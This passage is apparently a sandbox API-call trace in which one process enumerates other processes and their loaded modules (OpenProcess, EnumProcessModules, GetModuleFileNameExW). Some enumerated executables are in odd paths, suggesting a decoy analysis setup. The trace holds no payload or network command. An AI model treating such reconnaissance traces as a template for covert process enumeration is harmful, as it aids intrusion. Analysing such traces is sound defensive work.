hProcess=0x218, hModule=0x7fefcd70000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0052.898] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd760000, lpmodinfo=0x25202b8, cb=0x18 | out: lpmodinfo=0x25202b8*(lpBaseOfDll=0x7fefd760000, SizeOfImage=0x14000, EntryPoint=0x7fefd7610e0)) returned 1 [0052.901] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd760000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="RpcRtRemote.dll") returned 0xf [0052.903] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd760000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")) returned 0x23 [0052.906] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef3ad0000, lpmodinfo=0x2522488, cb=0x18 | out: lpmodinfo=0x2522488*(lpBaseOfDll=0x7fef3ad0000, SizeOfImage=0x13000, EntryPoint=0x7fef3ad7b68)) returned 1 [0052.908] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef3ad0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="MSOXMLMF.DLL") returned 0xc [0052.911] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef3ad0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSOXMLMF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msoxmlmf.dll")) returned 0x44 [0052.914] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8bd0000, lpmodinfo=0x25246a0, cb=0x18 | out: lpmodinfo=0x25246a0*(lpBaseOfDll=0x7fef8bd0000, SizeOfImage=0x19000, EntryPoint=0x7fef8bdee50)) returned 1 [0052.916] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8bd0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="VCRUNTIME140.dll") returned 0x10 [0052.920] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8bd0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VCRUNTIME140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll")) returned 0x24 [0052.922] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8bc0000, lpmodinfo=0x2526880, cb=0x18 | out: lpmodinfo=0x2526880*(lpBaseOfDll=0x7fef8bc0000, SizeOfImage=0x4000, EntryPoint=0x0)) returned 1 [0052.925] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8bc0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="api-ms-win-crt-runtime-l1-1-0.dll") returned 0x21 [0052.928] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8bc0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-runtime-l1-1-0.dll")) returned 0x35 [0052.930] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8ac0000, lpmodinfo=0x2528aa0, cb=0x18 | out: lpmodinfo=0x2528aa0*(lpBaseOfDll=0x7fef8ac0000, SizeOfImage=0xf2000, EntryPoint=0x7fef8ac9060)) returned 1 [0052.933] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8ac0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ucrtbase.DLL") returned 0xc [0052.936] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8ac0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ucrtbase.DLL" (normalized: "c:\\windows\\system32\\ucrtbase.dll")) returned 0x20 [0052.939] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8ab0000, lpmodinfo=0x252ac70, cb=0x18 | out: lpmodinfo=0x252ac70*(lpBaseOfDll=0x7fef8ab0000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0052.941] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8ab0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="api-ms-win-core-timezone-l1-1-0.dll") returned 0x23 [0052.944] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8ab0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll")) returned 0x37 [0052.947] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8aa0000, lpmodinfo=0x252cea8, cb=0x18 | out: lpmodinfo=0x252cea8*(lpBaseOfDll=0x7fef8aa0000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0052.951] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8aa0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="api-ms-win-core-file-l2-1-0.dll") returned 0x1f [0052.954] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8aa0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll")) returned 0x33 [0052.957] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8a90000, lpmodinfo=0x252f0b8, cb=0x18 | out: lpmodinfo=0x252f0b8*(lpBaseOfDll=0x7fef8a90000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0052.959] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8a90000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="api-ms-win-core-localization-l1-2-0.dll") returned 0x27 [0052.962] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8a90000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll")) returned 0x3b [0052.967] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9210000, lpmodinfo=0x25312e8, cb=0x18 | out: lpmodinfo=0x25312e8*(lpBaseOfDll=0x7fef9210000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0052.970] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9210000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="api-ms-win-core-synch-l1-2-0.dll") returned 0x20 [0052.973] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9210000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll")) returned 0x34 [0052.975] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8a80000, lpmodinfo=0x2533508, cb=0x18 | out: lpmodinfo=0x2533508*(lpBaseOfDll=0x7fef8a80000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0052.978] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8a80000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="api-ms-win-core-processthreads-l1-1-1.dll") returned 0x29 [0052.982] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8a80000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll")) returned 0x3d [0052.985] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8a70000, lpmodinfo=0x2535748, cb=0x18 | out: lpmodinfo=0x2535748*(lpBaseOfDll=0x7fef8a70000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0052.988] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8a70000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="api-ms-win-core-file-l1-2-0.dll") returned 0x1f [0052.991] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8a70000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll")) returned 0x33 [0052.994] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8a60000, lpmodinfo=0x2537958, cb=0x18 | out: lpmodinfo=0x2537958*(lpBaseOfDll=0x7fef8a60000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0052.997] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8a60000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="api-ms-win-crt-heap-l1-1-0.dll") returned 0x1e [0053.001] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8a60000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-heap-l1-1-0.dll")) returned 0x32 [0053.004] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8a50000, lpmodinfo=0x2539b68, cb=0x18 | out: lpmodinfo=0x2539b68*(lpBaseOfDll=0x7fef8a50000, SizeOfImage=0x4000, EntryPoint=0x0)) returned 1 [0053.007] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8a50000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="api-ms-win-crt-string-l1-1-0.dll") returned 0x20 [0053.010] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8a50000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-string-l1-1-0.dll")) returned 0x34 [0053.014] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8a40000, lpmodinfo=0x253bd88, cb=0x18 | out: lpmodinfo=0x253bd88*(lpBaseOfDll=0x7fef8a40000, SizeOfImage=0x4000, EntryPoint=0x0)) returned 1 [0053.017] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8a40000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="api-ms-win-crt-stdio-l1-1-0.dll") returned 0x1f [0053.020] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8a40000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-stdio-l1-1-0.dll")) returned 0x33 [0053.023] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef8a30000, lpmodinfo=0x253df98, cb=0x18 | out: lpmodinfo=0x253df98*(lpBaseOfDll=0x7fef8a30000, SizeOfImage=0x4000, EntryPoint=0x0)) returned 1 [0053.026] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef8a30000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="api-ms-win-crt-convert-l1-1-0.dll") returned 0x21 [0053.030] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef8a30000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll")) returned 0x35 [0053.034] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc130000, lpmodinfo=0x25401b8, cb=0x18 | out: lpmodinfo=0x25401b8*(lpBaseOfDll=0x7fefc130000, SizeOfImage=0x12c000, EntryPoint=0x7fefc1394bc)) returned 1 [0053.037] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc130000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="PROPSYS.dll") returned 0xb [0053.040] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc130000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\PROPSYS.dll" (normalized: "c:\\windows\\system32\\propsys.dll")) returned 0x1f [0053.044] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd830000, lpmodinfo=0x2542378, cb=0x18 | out: lpmodinfo=0x2542378*(lpBaseOfDll=0x7fefd830000, SizeOfImage=0x3b000, EntryPoint=0x7fefd831324)) returned 1 [0053.047] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd830000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="WINTRUST.dll") returned 0xc [0053.050] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd830000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINTRUST.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")) returned 0x20 [0053.054] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb720000, lpmodinfo=0x2544548, cb=0x18 | out: lpmodinfo=0x2544548*(lpBaseOfDll=0x7fefb720000, SizeOfImage=0x2c000, EntryPoint=0x7fefb7215c4)) returned 1 [0053.058] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb720000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="POWRPROF.dll") returned 0xc [0053.062] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb720000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\POWRPROF.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")) returned 0x20 [0053.066] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb4e0000, lpmodinfo=0x2546b30, cb=0x18 | out: lpmodinfo=0x2546b30*(lpBaseOfDll=0x7fefb4e0000, SizeOfImage=0x127000, EntryPoint=0x7fefb4e10ec)) returned 1 [0053.069] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb4e0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="taskschd.dll") returned 0xc [0053.073] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb4e0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")) returned 0x20 [0053.076] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbc60000, lpmodinfo=0x2548d00, cb=0x18 | out: lpmodinfo=0x2548d00*(lpBaseOfDll=0x7fefbc60000, SizeOfImage=0x35000, EntryPoint=0x7fefbc61064)) returned 1 [0053.080] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbc60000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="XmlLite.dll") returned 0xb [0053.083] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbc60000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\XmlLite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")) returned 0x1f [0053.087] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb20) returned 0x218 [0053.087] EnumProcessModules (in: hProcess=0x218, lphModule=0x254c910, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x254c910, lpcbNeeded=0x41eb20) returned 1 [0053.088] GetModuleInformation (in: hProcess=0x218, hModule=0xe0000, lpmodinfo=0x254cb80, cb=0x18 | out: lpmodinfo=0x254cb80*(lpBaseOfDll=0xe0000, SizeOfImage=0x17000, EntryPoint=0xe14a1)) returned 1 [0053.088] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xe0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0053.088] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xe0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Program Files\\WindowsPowerShell\\absolutetelnet.exe" (normalized: "c:\\program files\\windowspowershell\\absolutetelnet.exe")) returned 0x35 [0053.089] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x254edb8, cb=0x18 | out: lpmodinfo=0x254edb8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0053.089] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0053.089] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0053.090] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2550f90, cb=0x18 | out: lpmodinfo=0x2550f90*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0053.090] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0053.090] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0053.091] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2553150, cb=0x18 | out: lpmodinfo=0x2553150*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0053.091] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0053.091] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0053.092] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x2555320, cb=0x18 | out: lpmodinfo=0x2555320*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0053.092] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0053.093] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0053.093] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbe4) returned 0x218 [0053.093] EnumProcessModules (in: hProcess=0x218, lphModule=0x2557a30, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2557a30, lpcbNeeded=0x41eb20) returned 1 [0053.094] GetModuleInformation (in: hProcess=0x218, hModule=0x2f0000, lpmodinfo=0x2557ca0, cb=0x18 | out: lpmodinfo=0x2557ca0*(lpBaseOfDll=0x2f0000, SizeOfImage=0x17000, EntryPoint=0x2f14a1)) returned 1 [0053.094] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x2f0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="skype.exe") returned 0x9 [0053.094] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x2f0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Microsoft SQL Server\\skype.exe" (normalized: "c:\\program files (x86)\\microsoft sql server\\skype.exe")) returned 0x35 [0053.095] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2559ec8, cb=0x18 | out: lpmodinfo=0x2559ec8*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0053.096] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0053.097] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0053.097] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x255c088, cb=0x18 | out: lpmodinfo=0x255c088*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0053.097] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0053.098] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0053.098] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x255e248, cb=0x18 | out: lpmodinfo=0x255e248*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0053.098] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0053.099] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0053.099] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x2560418, cb=0x18 | out: lpmodinfo=0x2560418*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0053.100] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0053.100] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0053.101] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x994) returned 0x218 [0053.101] EnumProcessModules (in: hProcess=0x218, lphModule=0x2562b28, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2562b28, lpcbNeeded=0x41eb20) returned 1 [0053.101] GetModuleInformation (in: hProcess=0x218, hModule=0xd80000, lpmodinfo=0x2562d98, cb=0x18 | out: lpmodinfo=0x2562d98*(lpBaseOfDll=0xd80000, SizeOfImage=0x17000, EntryPoint=0xd814a1)) returned 1 [0053.101] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xd80000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="recentanalysis.exe") returned 0x12 [0053.102] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xd80000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Java\\recentanalysis.exe" (normalized: "c:\\program files\\java\\recentanalysis.exe")) returned 0x28 [0053.102] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2564fd0, cb=0x18 | out: lpmodinfo=0x2564fd0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0053.102] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0053.103] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0053.103] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x2567190, cb=0x18 | out: lpmodinfo=0x2567190*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0053.103] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0053.104] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0053.104] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x2569350, cb=0x18 | out: lpmodinfo=0x2569350*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0053.104] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0053.105] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0053.105] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x256b520, cb=0x18 | out: lpmodinfo=0x256b520*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0053.106] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0053.106] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0053.107] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x218 [0053.107] EnumProcessModules (in: hProcess=0x218, lphModule=0x256dc30, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x256dc30, lpcbNeeded=0x41eb20) returned 1 [0053.109] GetModuleInformation (in: hProcess=0x218, hModule=0xff780000, lpmodinfo=0x256dea0, cb=0x18 | out: lpmodinfo=0x256dea0*(lpBaseOfDll=0xff780000, SizeOfImage=0x35f000, EntryPoint=0xff7cc21c)) returned 1 [0053.109] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xff780000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="sppsvc.exe") returned 0xa [0053.109] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xff780000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sppsvc.exe" (normalized: "c:\\windows\\system32\\sppsvc.exe")) returned 0x1e [0053.109] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2570098, cb=0x18 | out: lpmodinfo=0x2570098*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0053.110] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0053.110] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0053.110] GetModuleInformation (in: hProcess=0x218, hModule=0x77710000, lpmodinfo=0x2572258, cb=0x18 | out: lpmodinfo=0x2572258*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0053.111] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77710000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0053.111] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77710000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0053.111] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd910000, lpmodinfo=0x2574428, cb=0x18 | out: lpmodinfo=0x2574428*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0053.112] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd910000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0053.112] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd910000, lpFilename=0x786bf0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0053.112] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x25765f8, cb=0x18 | out: lpmodinfo=0x25765f8*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0053.113] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, lpBaseName=0x786bf0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0053.113] 